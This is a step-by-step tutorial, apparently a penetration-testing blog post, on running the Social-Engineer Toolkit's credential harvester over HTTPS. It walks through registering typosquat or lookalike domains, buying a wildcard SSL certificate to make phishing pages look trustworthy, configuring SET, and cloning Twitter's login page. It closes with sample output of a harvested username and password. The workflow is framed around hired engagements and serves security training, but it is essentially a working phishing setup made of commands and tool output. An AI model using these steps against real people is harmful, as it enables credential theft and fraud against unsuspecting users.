The Social-Engineer Toolkit, commonly known as SET, was created by Dave Kennedy. It is a python based framework for a variety of tools centered around social engineering attacks.
A common SET technique is to use it to clone a website to socially engineer a user into installing malware or to grab their credentials. These client side attacks rely on enticing the target to click on a link.
These types of attacks can often build a better trust relationship with the target by adding in SSL and using https rather than straight http to perform the attack.
Setting this up with SET is not the most intuitive thing, but is actually quite easy to do.
1) Register a domain name for social engineering
The first step is to register a domain name for use with a social engineering attack. The first method is to pick one specific to each job. For instance if we were hired to target company.com we might pick pany.com so we could create the domain com.pany.com. We might also pick a “typo squat” copy like conpany.com or add on to the existing domain like company-llc.com.
The other method is to register a flexible domain name that can be used in multiple situations. For instance we will be using account-verify.com. This will allow us to create domains like facebook.account-verify.com or google.account-verify.com.
2) Pick a CA for your SSL certificate
After you register the domain name, you need to pick a Certificate Authority (CA) to sign your SSL certificate. The CA is the root of trust (insomuch as they can be trusted.) They sign your certificate to say it is valid. Of course they charge for this.
Common CAs include Comodo, Trustwave, Entrust, Thawte and lots of resellers that can cut you a good deal. SSL shopper does a pretty good job of tracking deals on certificate signing.
For our domain, account-verify.com, we will register for a wildcard certificate. A wildcard domain allows us to get one certificate for *. account-verify.com which will be valid for any host on account-verify.com
With a wildcard certificate we can create valid links for domains like:
It’s more expensive than a straight domain registration but can be very useful. NOTE: wildcard domain certificates only work to one level above the TLD. In other words:
will work, but
will give a domain name mismatch.
If you are planning on a single use domain like company-llc.com it is much cheaper to register for a certificate for a single host like www.company-llc.com
3) Generate your SSL key pair
After we decide on a CA we will need to generate a public/private key pair using openssl.We will use our public key as a certificate signing request or CSR.
We will need openssl to use the following command (all on one line. wrapped for readability):
$ openssl req -nodes -newkey rsa:2048 -keyout STAR_account-verify_com.key
While running the command, openssl will ask for specific information:
Country Name (2 letter code) [AU]: US
State or Province Name (full name) [Some-State]: New York
Locality Name (eg, city) :NYC
Organization Name (eg, company) [Internet Widgits Pty Ltd]: FakeCo, Ltd
Organizational Unit Name (eg, section) :
Common Name (eg, YOUR name) : *.account-verify.com
Email Address :
The most important field is the “common name” which is the domain name we are signing. Since we are registering a wildcard domain we will use the format of *.account-verify.com
, otherwise you should specify the exact domain like www.company-llc.com
The result of this command will be two files. Your private key and public/signing request key.
: private keySTAR_account-verify_com.csr
: public key/CSR
3) Submit your CSR
After generating your private and public key pair you will apply for your signed SSL certificate. Some CAs will require extensive documentation to prove who you are and that you own the domain. Usually you only need to receive an email at the domain in question. So we need to make sure we can receive email at an address like firstname.lastname@example.org
We will need to upload our public key/csr, STAR_account-verify_com.csr
, to the CA for signing.
After the certificate is signed (and paid for) you will receive an email with the signed and signing certificates. This is typically two or three files. You will definitely receive the signed certificate for your domain as well as the CA certificate used to sign it.
Sometimes the CA will not sign the certificate directly, but use chained, intermediate certificates instead. The CA signs an intermediate certificate which is then used to sign your actual certificate.
Your CA will typically return something like this:TrustedCARoot.crt
: CA certificateIntermediateCA.crt
: Optional Intermediate CA certSTAR_account-verify_com.crt
: Signed cert
CRT, CER, PEM, KEY, DER?
Depending on which CA you decide on you may get different files types back. The file extension you will usually get is one of the following: crt, cer, key, pem,
In reality the extension doesn’t matter. There are actually only two different encodings: PEM and DER. We are looking for PEM. PEM is plaintext (really ASCII Base64 encoded) and will start with “—– BEGIN …”. DER is a binary format.
You can use the following command to convert a DER certificate to PEM format:
$ openssl x509 -inform der -in certificate.der -out certificate.pem
To be compatible with SET we will need to rename our certificates so that they have the .pem
$ mv STAR_account-verify_com.key STAR_account-verify_com-key.pem
$ mv STAR_account-verify_com.crt STAR_account-verify_com.pem
Copy your private key, STAR_account-verify_com-key.pem
, and signed certificate, STAR_account-verify_com.pem
, to your SET server.
4) Configure SET
To configure SET to use SSL we need to edit the config file. You will find it here:
In the config file you need to modify the following lines:
PEM_CLIENT=/full/path/to/STAR_account-verify_com.pem # Your signed certificate
PEM_SERVER=/full/path/to/STAR_account-verify_com-key.pem # Your private key
5) Running SET
Now we can run SET.
From the main menu select:
1) Social-Engineering Attacks
2) Website Attack Vectors
And in our case we will run the userid/password stealing tool:
3) Credential Harvester Attack Method
We will use the “site cloning” option:
2) Site Cloner
And then follow the prompts. The first thing we need to provide is our domain for the POST action of the login form we will clone.
set:webattack> IP address for the POST back in Harvester/Tabnabbing: account-verify.com
Then we pick the login page we want to clone.
set:webattack> Enter the url to clone: https://twitter.com
And we let SET perform its web sucking magic
[*] Cloning the website: https://twitter.com
[*] This could take a little bit...
It usually doesn’t take long and will announce when it’s ready.
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 443
[*] Information will be displayed to you as it arrives below:
Now we just need to send out some hooks and see if we can’t hook some phish.
After we hook a
, I mean misguided user via phishing or smishing or however we get them to connect to our site.
c-10-2-3-4.hsd1.ga.comcast.net - - [27/Nov/2012 22:42:49] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: session[username_or_email]= email@example.com
POSSIBLE PASSWORD FIELD FOUND: session[password]= TestingHTTPSonSET
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=/
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
and there you go. Go use SET in all of its SSL splendor.